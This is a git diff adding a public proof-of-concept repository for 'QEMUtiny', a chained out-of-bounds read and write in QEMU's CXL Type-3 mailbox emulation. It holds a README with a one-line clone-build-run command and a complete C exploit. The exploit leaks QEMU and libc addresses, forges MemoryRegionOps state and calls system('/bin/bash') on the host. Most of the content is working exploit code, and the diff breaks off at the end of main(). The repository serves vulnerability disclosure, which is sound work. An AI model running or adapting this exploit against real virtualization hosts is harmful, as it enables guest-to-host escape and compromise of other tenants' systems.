diff --git a/qemu/README.md b/qemu/README.md new file mode 100644 index 0000000..bb21d1b --- /dev/null +++ b/qemu/README.md @@ -0,0 +1,131 @@ +# QEMUtiny + +## Abstract + +QEMUtiny is a memory corruption vulnerability in QEMU's implementation of CXL Type-3 +device emulation, reported against QEMU master `007b29752e` and confirmed +working against `5e61afe` (May 11, 2026). + +QEMUtiny was discovered autonomously with [V12](https://v12.sh) by Aaron Esau of the +[V12 security team](https://x.com/v12sec). The PoC was prepared by [@xia0o0o0o](https://xia0.sh/). + +> Want to find issues like this in your own code? Try V12 at https://v12.sh. + +The PoC chains two CXL mailbox bugs in `hw/cxl/cxl-mailbox-utils.c`: an +out-of-bounds read in `GET_LOG`, followed by an out-of-bounds write in +`SET_FEATURE`. + +1. **OOB read:** `cmd_logs_get_log()` treats the CEL log offset as an array + index in the `memmove()` source expression even though the CXL mailbox + offset is in bytes. +2. **OOB write:** `cmd_features_set_feature()` accepts byte offsets into + several small feature write-attribute structures without checking that + `offset + bytes_to_copy` stays inside the selected structure. + +We reported the bugs upstream. Maintainers state CXL support is currently for at non-virtualization use cases, so we feel comfortable release the PoC publicly. + +The included `poc.c` is a working exploit that drives the emulated CXL mailbox from the guest through the device BAR. It depends on offsets for the specific QEMU build and host libc layout. +The exploit can be weaponized to work reliably across many QEMU versions using the OOB read to scan memory. However this is out of scope for this PoC. + +## "QEMUtiny"? + +QEMU + Mutiny. + +## Building + +``` +gcc -O2 -Wall -Wextra -o exp poc.c +``` + +The reproducer must be run as root inside the guest because it writes PCI config +space and mmaps the CXL device BAR through sysfs. + +``` +sudo ./exp +``` + +One-line version: + +``` +git clone https://github.com/v12-security/pocs.git && cd pocs/qemu && gcc -O2 -Wall -Wextra -o exp poc.c && sudo ./exp +``` + +## Test Setup + +Use `./run_qemu_shell.sh`. Then in the guest, use `/exp` + + +`poc.c` assumes the CXL Type-3 device appears in the guest at: + +``` +/sys/bus/pci/devices/0000:35:00.0 +``` + +and that BAR2 is exposed as: + +``` +/sys/bus/pci/devices/0000:35:00.0/resource2 +``` + +If your guest enumerates the device at a different BDF, update the two sysfs +paths in `main()`. + +## How It Works + +1. **Mailbox access.** The guest enables PCI memory decoding for the CXL device, + maps BAR2, and sends CXL mailbox commands by writing the mailbox payload, + command, and control registers directly. + +2. **CEL out-of-bounds read.** `cmd_logs_get_log()` checks the requested CEL + range as if `offset` were a byte offset, but then performs pointer arithmetic + on `cci->cel_log` as a `struct cel_log *`. `poc.c` uses + `GET_LOG_OOB_BASE_OFFSET` to land just past the CEL buffer and read adjacent + QEMU CXL state. + +3. **QEMU address discovery.** The out-of-bounds CEL read leaks a CXL mailbox + command handler pointer and the `CXLType3Dev` heap address. The handler + pointer gives the QEMU PIE base for this build. + +4. **Rank sparing overflow.** The demo sends `SET_FEATURE / RANK_SPARING` with + a non-zero feature offset and a large payload. The rank sparing case copies + into `ct3d->rank_sparing_wr_attrs + hdr->offset` without bounding the copy to + `sizeof(ct3d->rank_sparing_wr_attrs)`, so the payload continues into later + `CXLType3Dev` fields. + +5. **Fake memory dispatch state.** The overflowed payload plants enough fake + `FlatView`, dispatch, section, `MemoryRegion`, and `MemoryRegionOps` state + for the sanitize path to call a controlled `MemoryRegionOps.write` callback. + +6. **Callback trigger.** `MEDIA_OPERATIONS / SANITIZE` starts a background + operation. When the sanitize worker reaches `address_space_set()`, it walks + the corrupted dispatch state and invokes the forged write callback. The demo + first uses this to call `memmove()` and leak libc, then repoints the callback + to `system("/bin/bash")`. + +## Affected Code Paths + +The missing `SET_FEATURE` bounds check affects the PPR paths and the sparing +write-attribute paths: + +- `soft_ppr_wr_attrs` +- `hard_ppr_wr_attrs` +- `cacheline_sparing_wr_attrs` +- `row_sparing_wr_attrs` +- `bank_sparing_wr_attrs` +- `rank_sparing_wr_attrs` + +`patrol_scrub_wr_attrs` already has the intended style of bounds check. + +## Affected Versions + +The full QEMUtiny chain uses two bugs. + +- **OOB read:** the vulnerable `GET_LOG` path was introduced by + `056172691b` (`hw/cxl/device: Add log commands (8.2.9.4) + CEL`), first + released in QEMU `v7.1.0`. +- **OOB write:** the vulnerable PPR and memory sparing `SET_FEATURE` paths were + introduced by `5e5a86bab8` and `da5cafdc4d`, released in QEMU v11.0.0. + +## Credit + +Found with V12 by Aaron Esau of the V12 security team. diff --git a/qemu/bios-256k.bin b/qemu/bios-256k.bin new file mode 100644 index 0000000..509f398 Binary files /dev/null and b/qemu/bios-256k.bin differ diff --git a/qemu/efi-e1000.rom b/qemu/efi-e1000.rom new file mode 100644 index 0000000..6312b11 Binary files /dev/null and b/qemu/efi-e1000.rom differ diff --git a/qemu/efi-e1000e.rom b/qemu/efi-e1000e.rom new file mode 100644 index 0000000..1f9e0e9 Binary files /dev/null and b/qemu/efi-e1000e.rom differ diff --git a/qemu/images/alpine-latest-releases.yaml b/qemu/images/alpine-latest-releases.yaml new file mode 100644 index 0000000..ca5d528 --- /dev/null +++ b/qemu/images/alpine-latest-releases.yaml @@ -0,0 +1,104 @@ +--- +- + title: "Mini root filesystem" + desc: | + Minimal root filesystem. + For use in containers + and minimal chroots. + branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-minirootfs + file: alpine-minirootfs-3.23.4-x86_64.tar.gz + iso: alpine-minirootfs-3.23.4-x86_64.tar.gz + date: 2026-04-15 + time: 04:51:29 + size: 3715799 + sha256: 85498865362aa7ebececa0d725a2f2e4db7ac4e4b2850b8df21645afa0d03ee3 + sha512: b3ff0f964f014033bf23006d6fcb83d7c5d4842cac958c236f064a256658576b41f3a749d48f82791b5ce981c828302fbce01efc9cb7be97eebb53f6ad5cde64 +- + title: "Netboot" + desc: | + Kernel, initramfs and modloop for + netboot. + + branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-netboot + file: alpine-netboot-3.23.4-x86_64.tar.gz + iso: alpine-netboot-3.23.4-x86_64.tar.gz + date: 2026-04-15 + time: 04:53:04 + size: 381806514 + sha256: 6929377b64d6bea9820e40b51ba98c1f72e5320206cdd4821cb11f5b1751c58a + sha512: e4dbc3c9afb4c29d353d1929ac5013b3819be512bdc18e60bd8cad83921211347ab053f840e1909f04da8f2ef0dd9614a0dd5321fcba1db6e0c16c623dbc63ec +- + title: "Standard" + desc: | + Alpine as it was intended. + Just enough to get you started. + Network connection is required. + branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-standard + file: alpine-standard-3.23.4-x86_64.iso + iso: alpine-standard-3.23.4-x86_64.iso + date: 2026-04-15 + time: 04:54:19 + size: 363855872 + sha256: cfef39c7954f7c4447bcb321b9f4a1cef834536a321309d2c31275d9f2475a4e + sha512: 0ac2492cf4081d8443da14948bbd0627bfa05c05465fa8a6abb5f445dc549ad58b5c96838235a865bbfc3efc0ab811aa22aa6c6e5c3edc0529aa07975cfe11bc +- + title: "Extended" + desc: | + Most common used packages included. + Suitable for routers and servers. + Runs from RAM. + Includes AMD and Intel microcode updates. + branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-extended + file: alpine-extended-3.23.4-x86_64.iso + iso: alpine-extended-3.23.4-x86_64.iso + date: 2026-04-15 + time: 04:55:46 + size: 1416314880 + sha256: 5ab0ec479e3de6da78f3cb12bdd2395768b1038b0fe3d12d3f57f39a9139015d + sha512: bf636d5eac914b3954871909e3899eb73eead66b19db52f3ae16da7680b4e1d7f688ca23f3a077c122cd22e55953ea92d1464f4ab0f7bad43ddc4a593edaa4cf +- + title: "Virtual" + desc: | + Similar to standard. + Slimmed down kernel. + Optimized for virtual systems. + branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-virt + file: alpine-virt-3.23.4-x86_64.iso + iso: alpine-virt-3.23.4-x86_64.iso + date: 2026-04-15 + time: 04:56:11 + size: 70254592 + sha256: f802033362595ad55de7bce00c500c51a756c94e229768afdcf7e68e49994c48 + sha512: 3cb57ce6bdd1abfa7fdb2015da21a0f416297579683eb16518db54870eba1f598f5a8577902e22caeb08468831766f6a6934d57ed490706f9014efbd8ff2971d +- + title: "Xen" + desc: | + Built-in support for Xen Hypervisor. + Includes packages targetted at Xen usage. + Use for Xen Dom0. + branch: v3.23 + arch: x86_64 + version: 3.23.4 + flavor: alpine-xen + file: alpine-xen-3.23.4-x86_64.iso + iso: alpine-xen-3.23.4-x86_64.iso + date: 2026-04-15 + time: 04:57:36 + size: 1473511424 + sha256: 696d228c2b6477d326bcce599dd75c1e8615c6ee70717d89cf6d93d7fc323545 + sha512: 5416c6a6c3ff304f4d9c367425ae5246dee032ad354e1a026839a332f252c804dc4f9d099bdf4bc475a692865d43ab617f9b59c5544bdd23db28cc59597c5fd7 diff --git a/qemu/images/alpine-minirootfs-3.23.4-x86_64.tar.gz b/qemu/images/alpine-minirootfs-3.23.4-x86_64.tar.gz new file mode 100644 index 0000000..085210c Binary files /dev/null and b/qemu/images/alpine-minirootfs-3.23.4-x86_64.tar.gz differ diff --git a/qemu/images/alpine.gz b/qemu/images/alpine.gz new file mode 100644 index 0000000..77c2a81 Binary files /dev/null and b/qemu/images/alpine.gz differ diff --git a/qemu/images/vmlinuz-linux b/qemu/images/vmlinuz-linux new file mode 100755 index 0000000..1f82b73 Binary files /dev/null and b/qemu/images/vmlinuz-linux differ diff --git a/qemu/kvmvapic.bin b/qemu/kvmvapic.bin new file mode 100644 index 0000000..045f5c2 Binary files /dev/null and b/qemu/kvmvapic.bin differ diff --git a/qemu/linuxboot_dma.bin b/qemu/linuxboot_dma.bin new file mode 100644 index 0000000..d176f62 Binary files /dev/null and b/qemu/linuxboot_dma.bin differ diff --git a/qemu/poc.c b/qemu/poc.c new file mode 100644 index 0000000..5e74f78 --- /dev/null +++ b/qemu/poc.c @@ -0,0 +1,558 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PCI_COMMAND 0x04 +#define PCI_COMMAND_MEMORY 0x0002 +#define PCI_COMMAND_MASTER 0x0004 + +#define CXL_MAILBOX_REGS 0x88 +#define CXL_MBOX_CTRL (CXL_MAILBOX_REGS + 0x04) +#define CXL_MBOX_CMD (CXL_MAILBOX_REGS + 0x08) +#define CXL_MBOX_STS (CXL_MAILBOX_REGS + 0x10) +#define CXL_MBOX_PAYLOAD (CXL_MAILBOX_REGS + 0x20) +#define CXL_BAR2_MAP_SIZE 0x1000 + +#define CXL_MBOX_SUCCESS 0x00 + +#define LOGS 0x04 +#define GET_LOG 0x01 +#define FEATURES 0x05 +#define SET_FEATURE 0x02 +#define SANITIZE 0x44 +#define MEDIA_OPERATIONS 0x02 + +#define SET_FEATURE_HDR_LEN 0x20 +#define SET_FEATURE_INITIATE 0x01 +#define RANK_SPARING_SET_VERSION 0x01 + +#define MEDIA_OP_CLASS_SANITIZE 0x01 +#define MEDIA_OP_SAN_SUBC_SANITIZE 0x00 + +#define CXL_MBOX_BG_STARTED 0x01 + +#define GET_LOG_OOB_BASE_OFFSET 0x10000 + +#define FAKE_FLATVIEW_OFF 0x54e +#define FAKE_DISPATCH_OFF 0x58e +#define FAKE_SECTION_OFF 0x5ce +#define FAKE_MEMORY_REGION_OFF 0x62e +#define FAKE_OPS_OFF 0x74e +#define FAKE_BITMAP_OFF 0x7ae +#define FAKE_COMMAND_OFF 0x7b6 +#define RIP_SMASH_DATA_LEN 0x7c0 + +#define CXL_STATIC_VMEM_SIZE 0x10000000 +#define CXL_CACHELINE_SIZE 0x40 + +#define QEMU_PACKED __attribute__((packed)) + +static int enable_pci_memory_decode(const char *dev_path) +{ + char path[PATH_MAX + 32]; + int fd; + uint16_t cmd; + ssize_t n; + + snprintf(path, sizeof(path), "%s/config", dev_path); + fd = open(path, O_RDWR); + if (fd < 0) { + printf("[-] open(%s) failed: %s\n", path, strerror(errno)); + return -1; + } + + n = pread(fd, &cmd, sizeof(cmd), PCI_COMMAND); + if (n != (ssize_t)sizeof(cmd)) { + printf("[-] pread PCI_COMMAND failed: %s\n", + n < 0 ? strerror(errno) : "short read"); + close(fd); + return -1; + } + + cmd |= PCI_COMMAND_MEMORY | PCI_COMMAND_MASTER; + n = pwrite(fd, &cmd, sizeof(cmd), PCI_COMMAND); + if (n != (ssize_t)sizeof(cmd)) { + printf("[-] pwrite PCI_COMMAND failed: %s\n", + n < 0 ? strerror(errno) : "short write"); + close(fd); + return -1; + } + + close(fd); + return 0; +} + +static void mmio_write32(volatile uint8_t *mmio, size_t off, uint32_t value) { + *(volatile uint32_t *)(mmio + off) = value; +} + +static void mmio_write64(volatile uint8_t *mmio, size_t off, uint64_t value) { + *(volatile uint64_t *)(mmio + off) = value; +} + +static uint64_t mmio_read64(volatile uint8_t *mmio, size_t off) { + return *(volatile uint64_t *)(mmio + off); +} + +static void mmio_write_bytes(volatile uint8_t *mmio, size_t off, + const uint8_t *buf, size_t len) +{ + for (size_t i = 0; i < len; i++) { + *(volatile uint8_t *)(mmio + off + i) = buf[i]; + } +} + +static void mmio_read_bytes(volatile uint8_t *mmio, size_t off, + uint8_t *buf, size_t len) +{ + for (size_t i = 0; i < len; i++) { + buf[i] = *(volatile uint8_t *)(mmio + off + i); + } +} + +static int leak_oob_relative(volatile uint8_t *mmio, uint32_t rel, + void *dst, size_t len) +{ + uint8_t tmp[0x800]; + uint32_t aligned_rel = rel & ~3U; + uint32_t inner = rel & 3U; + uint32_t req_len = (uint32_t)len + inner; + struct { + uint8_t uuid[16]; + uint32_t offset; + uint32_t length; + } QEMU_PACKED get_log = { + .uuid = { + 0x0d, 0xa9, 0xc0, 0xb5, 0xbf, 0x41, 0x4b, 0x78, + 0x8f, 0x79, 0x96, 0xb1, 0x62, 0x3b, 0x3f, 0x17, + }, + .offset = GET_LOG_OOB_BASE_OFFSET + aligned_rel / 4, + .length = req_len, + }; + uint64_t cmd_reg; + uint64_t sts_reg; + uint32_t out_len; + uint16_t ret; + + mmio_write_bytes(mmio, CXL_MBOX_PAYLOAD, (const uint8_t *)&get_log, + sizeof(get_log)); + + cmd_reg = GET_LOG | (LOGS << 8) | ((uint64_t)sizeof(get_log) << 16); + mmio_write64(mmio, CXL_MBOX_CMD, cmd_reg); + mmio_write32(mmio, CXL_MBOX_CTRL, 1); + + sts_reg = mmio_read64(mmio, CXL_MBOX_STS); + cmd_reg = mmio_read64(mmio, CXL_MBOX_CMD); + ret = (uint16_t)((sts_reg >> 32) & 0xffff); + out_len = (uint32_t)((cmd_reg >> 16) & 0xfffff); + + if (ret != CXL_MBOX_SUCCESS) { + printf("[-] failed to get log\n"); + return 2; + } + + mmio_read_bytes(mmio, CXL_MBOX_PAYLOAD, tmp, out_len); + memcpy(dst, tmp + inner, len); + return 0; +} + +static int leak_qemu(volatile uint8_t *mmio, uint64_t *memmove_plt, + uint64_t *libc_start_main_got) +{ + uint8_t raw[8]; + uint64_t handler; + uint64_t qemu_base; + + leak_oob_relative(mmio, 0x80d0, raw, sizeof(raw)); + + handler = *(uint64_t *)raw; + printf("[+] LOGS_GET_LOG handler: 0x%016" PRIx64 "\n", handler); + + qemu_base = handler - 0x047E735; // cmd_logs_get_log + if (qemu_base & 0xfff) { + printf("[-] ??? 0x%016" PRIx64 "\n", qemu_base); + return 1; + } + + *memmove_plt = qemu_base + 0x0341BB0; + *libc_start_main_got = qemu_base + 0x01E72FF8; + + printf("[+] qemu: 0x%016" PRIx64 "\n", qemu_base); + printf("[+] memmove@plt: 0x%016" PRIx64 "\n", *memmove_plt); + printf("[+] __libc_start_main@got: 0x%016" PRIx64 "\n", *libc_start_main_got); + return 0; +} + +static void hexdump_raw(const uint8_t *data, size_t len, size_t disp_base) +{ + int eliding = 0; + for (size_t i = 0; i < len; i += 16) { + int all_zero = 1; + for (size_t j = 0; j < 16 && i + j < len; j++) + if (data[i + j]) { all_zero = 0; break; } + if (all_zero) { + if (!eliding) + printf(" \x1b[90m *\x1b[0m\n"); + eliding = 1; + continue; + } + eliding = 0; + printf("\x1b[90m %04zx \x1b[0m", disp_base + i); + for (size_t j = 0; j < 16; j++) { + if (j == 8) printf(" "); + if (i + j < len) + printf("%s%02x\x1b[0m ", data[i + j] ? "\x1b[97m" : "\x1b[90m", data[i + j]); + else + printf(" "); + } + printf(" \x1b[90m|\x1b[0m"); + for (size_t j = 0; j < 16 && i + j < len; j++) { + uint8_t c = data[i + j]; + if (c >= 0x20 && c < 0x7f) printf("%c", c); + else if (c == 0) printf("\x1b[90m.\x1b[0m"); + else printf("\x1b[91m*\x1b[0m"); + } + printf("\x1b[90m|\x1b[0m\n"); + } + if (eliding) + printf(" \x1b[90m *\x1b[0m\n"); +} + +static int trigger_media_operations_sanitize(volatile uint8_t *mmio, + uint64_t dpa_addr, + uint64_t length) +{ + struct { + uint8_t media_operation_class; + uint8_t media_operation_subclass; + uint8_t rsvd[2]; + uint32_t dpa_range_count; + struct { + uint64_t starting_dpa; + uint64_t length; + } QEMU_PACKED dpa_range_list[1]; + } QEMU_PACKED media_op_in_sanitize_pl = { + .media_operation_class = MEDIA_OP_CLASS_SANITIZE, + .media_operation_subclass = MEDIA_OP_SAN_SUBC_SANITIZE, + .dpa_range_count = 1, + .dpa_range_list = { + { + .starting_dpa = dpa_addr, + .length = length, + }, + }, + }; + uint64_t cmd_reg; + uint64_t sts_reg; + uint16_t ret; + + printf("\n\x1b[1;96m >> MEDIA_OPERATIONS / SANITIZE\x1b[0m\n"); + printf(" \x1b[90mclass\x1b[0m \x1b[93m0x%02x\x1b[0m \x1b[90msubclass\x1b[0m \x1b[93m0x%02x\x1b[0m\n", + MEDIA_OP_CLASS_SANITIZE, MEDIA_OP_SAN_SUBC_SANITIZE); + printf(" \x1b[90mdpa\x1b[0m \x1b[92m0x%016" PRIx64 "\x1b[0m\n", dpa_addr); + printf(" \x1b[90mlength\x1b[0m \x1b[92m0x%016" PRIx64 "\x1b[0m\n", length); + printf(" \x1b[90mpayload\x1b[0m %zu bytes\n", sizeof(media_op_in_sanitize_pl)); + + mmio_write_bytes(mmio, CXL_MBOX_PAYLOAD, (const uint8_t *)&media_op_in_sanitize_pl, sizeof(media_op_in_sanitize_pl)); + + cmd_reg = MEDIA_OPERATIONS | (SANITIZE << 8) | ((uint64_t)sizeof(media_op_in_sanitize_pl) << 16); + printf(" \x1b[90mcmd_reg\x1b[0m \x1b[95m0x%016" PRIx64 "\x1b[0m\n", cmd_reg); + mmio_write64(mmio, CXL_MBOX_CMD, cmd_reg); + mmio_write32(mmio, CXL_MBOX_CTRL, 1); + + sts_reg = mmio_read64(mmio, CXL_MBOX_STS); + ret = (uint16_t)((sts_reg >> 32) & 0xffff); + + if (ret != CXL_MBOX_BG_STARTED && ret != CXL_MBOX_SUCCESS) { + printf(" \x1b[1;91m<< FAILED\x1b[0m ret=\x1b[91m0x%04x\x1b[0m\n\n", ret); + return 2; + } + printf(" \x1b[1;92m<< OK\x1b[0m ret=\x1b[92m0x%04x\x1b[0m sts=\x1b[90m0x%016" PRIx64 "\x1b[0m\n\n", ret, sts_reg); + return 0; +} + +void trigger_set_feature_rank_raw(volatile uint8_t *mmio, + uint16_t feature_offset, + const uint8_t *data, + uint32_t data_len) +{ + struct { + uint8_t uuid[16]; + uint32_t flags; + uint16_t offset; + uint8_t version; + uint8_t rsvd[9]; + uint8_t data[0x800 - SET_FEATURE_HDR_LEN]; + } QEMU_PACKED set_feature = { + .uuid = { + 0x34, 0xdb, 0xaf, 0xf5, 0x05, 0x52, 0x42, 0x81, + 0x8f, 0x76, 0xda, 0x0b, 0x5e, 0x7a, 0x76, 0xa7, + }, + .flags = SET_FEATURE_INITIATE, + .offset = feature_offset, + .version = RANK_SPARING_SET_VERSION, + }; + uint64_t cmd_reg; + uint32_t in_len = SET_FEATURE_HDR_LEN + data_len; + + memcpy(set_feature.data, data, data_len); + + printf("\n\x1b[1;96m >> SET_FEATURE / RANK_SPARING\x1b[0m\n"); + printf(" \x1b[90muuid\x1b[0m \x1b[95m34dbaf f5-0552-4281-8f76-da0b5e7a76a7\x1b[0m\n"); + printf(" \x1b[90moffset\x1b[0m \x1b[93m0x%04x\x1b[0m\n", feature_offset); + printf(" \x1b[90mversion\x1b[0m \x1b[93m0x%02x\x1b[0m\n", RANK_SPARING_SET_VERSION); + printf(" \x1b[90mflags\x1b[0m \x1b[93m0x%08x\x1b[0m (INITIATE)\n", SET_FEATURE_INITIATE); + printf(" \x1b[90mdata_len\x1b[0m \x1b[92m0x%x\x1b[0m\n", data_len); + printf(" \x1b[90min_len\x1b[0m \x1b[92m0x%x\x1b[0m (hdr 0x%x + data)\n", in_len, SET_FEATURE_HDR_LEN); + + printf(" \x1b[90mdata:\x1b[0m\n"); + hexdump_raw(data, data_len, feature_offset); + + mmio_write_bytes(mmio, CXL_MBOX_PAYLOAD, + (const uint8_t *)&set_feature, in_len); + + cmd_reg = SET_FEATURE | (FEATURES << 8) | ((uint64_t)in_len << 16); + printf(" \x1b[90mcmd_reg\x1b[0m \x1b[95m0x%016" PRIx64 "\x1b[0m\n", cmd_reg); + mmio_write64(mmio, CXL_MBOX_CMD, cmd_reg); + mmio_write32(mmio, CXL_MBOX_CTRL, 1); + printf(" \x1b[1;92m<< sent\x1b[0m\n\n"); + + return; +} + +static void hexdump_payload(const uint8_t *data, size_t len) +{ + static const struct { + size_t start; + size_t end; + const char *col; + const char *name; + } regions[] = { + { 0x000, 0x2e, "\x1b[90m", "zero-init" }, + { 0x2e, 0xee, "\x1b[37m", "mr-seeds" }, + { 0xee, FAKE_FLATVIEW_OFF, "\x1b[37m", "region0" }, + { FAKE_FLATVIEW_OFF, FAKE_DISPATCH_OFF, "\x1b[92m", "FlatView" }, + { FAKE_DISPATCH_OFF, FAKE_SECTION_OFF, "\x1b[96m", "Dispatch" }, + { FAKE_SECTION_OFF, FAKE_MEMORY_REGION_OFF, "\x1b[93m", "Section" }, + { FAKE_MEMORY_REGION_OFF, FAKE_OPS_OFF, "\x1b[95m", "MemRegion" }, + { FAKE_OPS_OFF, FAKE_BITMAP_OFF, "\x1b[94m", "Ops" }, + { FAKE_BITMAP_OFF, FAKE_COMMAND_OFF, "\x1b[91m", "Bitmap" }, + { FAKE_COMMAND_OFF, RIP_SMASH_DATA_LEN, "\x1b[97m", "Command" }, + }; + const int nregions = (int)(sizeof(regions) / sizeof(regions[0])); + int prev_region = -1; + int in_elision = 0; + + printf("\n\x1b[1m payload hexdump (%zu bytes)\x1b[0m\n ", len); + for (int r = 0; r < nregions; r++) + printf("%s%-11s\x1b[0m ", regions[r].col, regions[r].name); + printf("\n\n"); + + for (size_t i = 0; i < len; i += 16) { + int cur = 0; + for (int r = 0; r < nregions; r++) { + if (i >= regions[r].start && i < regions[r].end) { cur = r; break; } + } + if (cur != prev_region) { + if (in_elision) + printf(" \x1b[90m *\x1b[0m\n"); + in_elision = 0; + printf(" %s+-- %-11s @ +0x%03zx\x1b[0m\n", + regions[cur].col, regions[cur].name, regions[cur].start); + prev_region = cur; + } + + int all_zero = 1; + for (size_t j = 0; j < 16 && i + j < len; j++) + if (data[i + j]) { all_zero = 0; break; } + if (all_zero) { + if (!in_elision) + printf(" \x1b[90m *\x1b[0m\n"); + in_elision = 1; + continue; + } + in_elision = 0; + + printf("\x1b[90m %04zx \x1b[0m ", i); + + for (size_t j = 0; j < 16; j++) { + if (j == 8) printf(" "); + if (i + j >= len) { printf(" "); continue; } + uint8_t b = data[i + j]; + size_t pos = i + j; + const char *col = "\x1b[90m"; + for (int r = 0; r < nregions; r++) { + if (pos >= regions[r].start && pos < regions[r].end) { + col = b ? regions[r].col : "\x1b[90m"; + break; + } + } + printf("%s%02x\x1b[0m ", col, b); + } + + printf(" \x1b[90m|\x1b[0m"); + for (size_t j = 0; j < 16 && i + j < len; j++) { + uint8_t c = data[i + j]; + if (c >= 0x20 && c < 0x7f) printf("%c", c); + else if (c == 0) printf("\x1b[90m.\x1b[0m"); + else printf("\x1b[91m*\x1b[0m"); + } + printf("\x1b[90m|\x1b[0m\n"); + } + if (in_elision) + printf(" \x1b[90m *\x1b[0m\n"); + printf("\n"); +} + +static void forge_callback_payload(uint8_t *data, uint64_t rank_host, + uint64_t fn, uint64_t opaque, + uint64_t mr_addr, const char *arg) +{ + uint64_t fake_flatview = rank_host + FAKE_FLATVIEW_OFF; + uint64_t fake_dispatch = rank_host + FAKE_DISPATCH_OFF; + uint64_t fake_section = rank_host + FAKE_SECTION_OFF; + uint64_t fake_mr = rank_host + FAKE_MEMORY_REGION_OFF; + uint64_t fake_ops = rank_host + FAKE_OPS_OFF; + uint64_t fake_bitmap = rank_host + FAKE_BITMAP_OFF; + uint64_t fake_command = rank_host + FAKE_COMMAND_OFF; + uint8_t *region0 = data + 0xee; + const uint64_t section_size = CXL_CACHELINE_SIZE; + + memset(data, 0, RIP_SMASH_DATA_LEN); + + *(uint64_t *)(data + 0x2e) = fake_flatview; + *(uint64_t *)(data + 0xb6) = CXL_CACHELINE_SIZE; + data[0xea] = 1; + + *(uint64_t *)(region0 + 0) = CXL_STATIC_VMEM_SIZE; + *(uint64_t *)(region0 + 8) = CXL_CACHELINE_SIZE; + *(uint64_t *)(region0 + 16) = CXL_CACHELINE_SIZE; + *(uint64_t *)(region0 + 24) = CXL_CACHELINE_SIZE; + *(uint64_t *)(region0 + 40) = fake_bitmap; + region0[0x6c] = 1; + + *(uint32_t *)(data + FAKE_FLATVIEW_OFF + 16) = 1; + *(uint64_t *)(data + FAKE_FLATVIEW_OFF + 40) = fake_dispatch; + *(uint64_t *)(data + FAKE_FLATVIEW_OFF + 48) = fake_mr; + + *(uint64_t *)(data + FAKE_DISPATCH_OFF) = fake_section; + + *(uint64_t *)(data + FAKE_SECTION_OFF) = section_size; + *(uint64_t *)(data + FAKE_SECTION_OFF + 8) = 0; + *(uint64_t *)(data + FAKE_SECTION_OFF + 16) = fake_mr; + *(uint64_t *)(data + FAKE_SECTION_OFF + 24) = fake_flatview; + *(uint64_t *)(data + FAKE_SECTION_OFF + 32) = mr_addr; + *(uint64_t *)(data + FAKE_SECTION_OFF + 40) = CXL_STATIC_VMEM_SIZE; + + *(uint64_t *)(data + FAKE_MEMORY_REGION_OFF + 80) = fake_ops; + if (arg) { + snprintf((char *)data + FAKE_COMMAND_OFF, + RIP_SMASH_DATA_LEN - FAKE_COMMAND_OFF, "%s", arg); + opaque = fake_command; + } + *(uint64_t *)(data + FAKE_MEMORY_REGION_OFF + 88) = opaque; + *(uint64_t *)(data + FAKE_MEMORY_REGION_OFF + 112) = section_size; + data[FAKE_MEMORY_REGION_OFF + 152] = 1; + data[FAKE_MEMORY_REGION_OFF + 154] = 1; + + *(uint64_t *)(data + FAKE_OPS_OFF + 8) = fn; + *(uint32_t *)(data + FAKE_OPS_OFF + 40) = 1; + *(uint32_t *)(data + FAKE_OPS_OFF + 44) = 1; + data[FAKE_OPS_OFF + 48] = 1; + *(uint32_t *)(data + FAKE_OPS_OFF + 64) = 1; + *(uint32_t *)(data + FAKE_OPS_OFF + 68) = 1; + data[FAKE_OPS_OFF + 72] = 1; + *(uint64_t *)(data + FAKE_BITMAP_OFF) = UINT64_MAX; + + hexdump_payload(data, RIP_SMASH_DATA_LEN); +} + +void fake_write_call(volatile uint8_t *mmio, uint64_t rank_host, + uint64_t fn, uint64_t opaque, uint64_t mr_addr, + const char *arg) +{ + uint8_t data[RIP_SMASH_DATA_LEN]; + printf("[*] MemoryRegionOps.write=0x%016" PRIx64 " opaque=0x%016" PRIx64 " mr_addr=0x%016" PRIx64 "\n", fn, opaque, mr_addr); + + forge_callback_payload(data, rank_host, fn, opaque, mr_addr, arg); + trigger_set_feature_rank_raw(mmio, 0x2e, data + 0x2e, sizeof(data) - 0x2e); + trigger_media_operations_sanitize(mmio, CXL_STATIC_VMEM_SIZE, CXL_CACHELINE_SIZE); + + printf("[*] waiting."); + for (int i = 0; i < 8; i++) { + sleep(1); printf("."); + } + printf("\n"); + printf("[*] ok here we go\n"); + return; +} + +static int leak_more(volatile uint8_t *mmio, uint64_t ct3d_host, + uint64_t rank_host, uint64_t memmove_plt, + uint64_t libc_start_main_got, uint64_t *_system) +{ + uint64_t leak_slot = ct3d_host + 0x5400 + 0x240000 + 0x100; + uint64_t leak_src = libc_start_main_got - (CXL_CACHELINE_SIZE - 1); + uint8_t raw[8]; + uint64_t libc_start_main; + uint64_t libcbase; + + fake_write_call(mmio, rank_host, memmove_plt, leak_slot, leak_src, NULL); + leak_oob_relative(mmio, 0x100, raw, sizeof(raw)); + + libc_start_main = *(uint64_t *)raw; + printf("[+] __libc_start_main: 0x%016" PRIx64 "\n", libc_start_main); + + libcbase = libc_start_main - 0x2A200; + *_system = libcbase + 0x058750; + printf("[+] libcbase: 0x%016" PRIx64 "\n", libcbase); + printf("[+] system: 0x%016" PRIx64 "\n", *_system); + return 0; +} + +int main() { + volatile uint8_t *mmio; + uint64_t ct3d_host; + uint64_t rank_host; + uint64_t memmove_plt; + uint64_t libc_start_main_got; + uint64_t _system; + int fd; + + setbuf(stdout, NULL); + + if (enable_pci_memory_decode("/sys/bus/pci/devices/0000:35:00.0") < 0) { + return 1; + } + + fd = open("/sys/bus/pci/devices/0000:35:00.0/resource2", O_RDWR | O_SYNC); + if (fd < 0) { + printf("[-] failed to open. \n"); + return 1; + } + + mmio = mmap(NULL, CXL_BAR2_MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); + if (mmio == MAP_FAILED) { + return 1; + } + + leak_qemu(mmio, &memmove_plt, &libc_start_main_got); + leak_oob_relative(mmio, 0x90, &ct3d_host, 8); + rank_host = ct3d_host + 0x6c5762; + + leak_more(mmio, ct3d_host, rank_host, memmove_plt, libc_start_main_got, &_system); + printf("[*] outside the Wall Maria...\n"); + fake_write_call(mmio, rank_host, _system, 0, 0, "/bin/bash"); + + return 